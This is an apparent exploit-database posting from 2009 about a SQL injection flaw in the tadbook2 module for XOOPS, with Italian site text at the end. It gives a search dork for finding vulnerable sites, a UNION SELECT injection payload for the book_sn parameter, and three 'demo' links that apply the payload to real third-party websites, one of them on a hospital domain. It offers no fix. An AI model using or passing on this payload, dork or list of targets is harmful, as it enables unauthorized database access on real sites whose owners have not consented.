XOOPS Module tadbook2 (open_book.php book_sn) SQL Injection Vuln

2009-01-11 06:04:47

##########################################
#
# XOOPS Module: tadbook2
#
#
##########################################
#
##AUTHOR : Stylextra
#
####HOME : http://www.zamet.org
#
####MAIL : [email protected]
#
###########################################
#
# DORKS : dork: /modules/tadbook2/open_book.php?book_sn=
###########################################

target: scriptpage.com/modules/tadbook2/open_book.php?book_sn=[sql Code]

Sql code: -99/**/union/**/select/**/version(),2/*

live link: http://xxx.com/modules/tadbook2/open_book.php?book_sn=-99/**/union/**/select/**/version(),2/*

demo1 : http://pr.hosp.ncku.edu.tw/modules/tadbook2/open_book.php?book_sn=-5/**/union/**/select/**/version(),2/*

demo2 : http://www.off.tw/modules/tadbook2/open_book.php?book_sn=-1/**/union/**/select/**/version(),2/*

demo3 : http://www.taot.org.tw/modules/tadbook2/open_book.php?book_sn=-10/**/union/**/select/**/version(),2/*

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.